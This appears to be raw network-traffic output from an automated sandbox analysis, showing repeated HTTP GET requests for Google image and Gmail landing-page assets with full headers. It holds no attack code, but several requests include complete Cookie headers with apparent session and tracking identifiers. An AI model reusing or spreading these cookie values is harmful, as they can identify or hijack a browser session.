NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /LSYb8fYo6BAagAGpNrc_tg1pGwWDUiQ6Q_b_aHGIL6YFJS3t3Q9tz8Zp_PDemg8w4wkFh8ronfMjHlZxzyrxJI_yHogTxmMKtVEQyA=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/js/main.min.js?fingerprint=ea765c6dd1eca878e6cab0f9c592ef5b HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /VmoqjZj_qQ4kCYjLxpy8KMOZiFtJ5Q6SkhrU36j18nYJUMvusjqk_fnfFs-ZaiI2tQ3OaUR-4kuWS_tZ2d3V-IP5DQYPUTX0i7wgDg=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/images/logo-gmail.png?fingerprint=c2eaf4aae389c3f885e97081bb197b97 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /OPytN2BZpLrg-Jf6gRoDo_dJGGBLseMyBv0vo6PAEmzXeEud74RkobzNkzBFJA_uPdIzXocbqka4OaKPqWKyqycMrnHlhzOcICdYs0Gn=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /GhfIwA6ZINFkFgE77BVZ596ZtFXFc72Z6OfHGeHh4VO8ZSNBZkXXcRdgWvhzJKDzmy22DROUcJKCaZbeDHpT7raQ-ZKBmj1MM1JqGQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /2noIz2X2ov5fXwxhW8AbSDnLpp8tT3mI3-iV_OQ2UOwX_EhIBBgip7FPRs10DYmPKinVM98Qkjr1uN3BhQ3StGXCp1-O_wPwoLZeDQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hgUtJ1raSgkAHurP6yDzukLnNF1V7vS4MTeqzThHkHTz1sc8nYizzkb6TPElQ0_LzIZEmwIEYgv7J1PZO-KUvQjONRqHNTc3p72BnEQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /N_lV5xwErJpAK4jkrNwMMQfbQN7gs0loaMzQHVF768czQNAHsMWW6Kk1FUJnbH0c7uleBoV0UHjS08oJX368wIdGz_4b1buadd3d5Cw=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Cle-1GLl4P8zbJafbrnN8-7CgfVSduAR1j2DACNepAm5JL37GANl8tIM1h72Cyga71wO2lGcNPONnQl5MKFi_1TGSBQM8mV9qaKdQw=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /LSYb8fYo6BAagAGpNrc_tg1pGwWDUiQ6Q_b_aHGIL6YFJS3t3Q9tz8Zp_PDemg8w4wkFh8ronfMjHlZxzyrxJI_yHogTxmMKtVEQyA=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/images/animation/Template5050Accordion_Express_emojis_Mobile_Animation.json?fingerprint=02e3ffb3de7b329cc362662939d1f2e3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/images/animation/Template5050Accordion_Express_emojis_Desktop_Animation.json?fingerprint=a9e4eefea555de09a379f995f6fe0cfb HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /VmoqjZj_qQ4kCYjLxpy8KMOZiFtJ5Q6SkhrU36j18nYJUMvusjqk_fnfFs-ZaiI2tQ3OaUR-4kuWS_tZ2d3V-IP5DQYPUTX0i7wgDg=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /GhfIwA6ZINFkFgE77BVZ596ZtFXFc72Z6OfHGeHh4VO8ZSNBZkXXcRdgWvhzJKDzmy22DROUcJKCaZbeDHpT7raQ-ZKBmj1MM1JqGQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /N_lV5xwErJpAK4jkrNwMMQfbQN7gs0loaMzQHVF768czQNAHsMWW6Kk1FUJnbH0c7uleBoV0UHjS08oJX368wIdGz_4b1buadd3d5Cw=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hgUtJ1raSgkAHurP6yDzukLnNF1V7vS4MTeqzThHkHTz1sc8nYizzkb6TPElQ0_LzIZEmwIEYgv7J1PZO-KUvQjONRqHNTc3p72BnEQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /Cle-1GLl4P8zbJafbrnN8-7CgfVSduAR1j2DACNepAm5JL37GANl8tIM1h72Cyga71wO2lGcNPONnQl5MKFi_1TGSBQM8mV9qaKdQw=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /2noIz2X2ov5fXwxhW8AbSDnLpp8tT3mI3-iV_OQ2UOwX_EhIBBgip7FPRs10DYmPKinVM98Qkjr1uN3BhQ3StGXCp1-O_wPwoLZeDQ=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/images/animation/Template5050Accordion_Express_emojis_Mobile_Animation.json?fingerprint=02e3ffb3de7b329cc362662939d1f2e3 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /1RU8Tw2qIdW1W809P_jE62_9EGnxtBRL6TgQ95AFO1zH-ShZ5OdhAceX9vhp7I8Aan1-mPneQlg7iBBls7Z46KpPXCFAIyrxfH5h94s=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /YqGm39Z5sh9A5xtQbH_iZFAKj6kwCkY447q5cjzGcb85qccGrZn5xO_N_XwKpx1nd3XA-l6tJyz2qk7Xxk8ThS1-W78mBoEfPVKF4hm4=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /ZRyB3x_HY1IUsygqV_W2IoW3vhFGiqLKJc2RZVndWfTq5x7PoLzgpP0clM5xFWSh8zIL0Ha3-OI2KbDLKdKob_qjKo10ICrcFWRaPA=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /gmail/about/static-2.0/images/animation/Template5050Accordion_Express_emojis_Desktop_Animation.json?fingerprint=a9e4eefea555de09a379f995f6fe0cfb HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w; _ga=GA1.1.1750548212.1727448151; _gid=GA1.1.1821548086.1727448151; _gat_UA-96046856-1=1
            Source: global trafficHTTP traffic detected: GET /Kkh1J0HrlRSnxSQrtnP4DFSMb4SI7Rz0yAT0G6ku1QOARBJJ4To-rDzu0tfCOMWvNCtYvCYaM92ISqiDPr-8KtwNqYO3xuJERwASsfn2=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rfShPjLrCpP1spYseWH2YzL9K62fcSLUnapJMso0sowj2kH8X4YBYDCYXKIRL9CcNz9xk7AHQJOl0FawCFFORDri1_caMFRvr26-Tpy7=rw-e365-w2880 HTTP/1.1Host: lh3.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
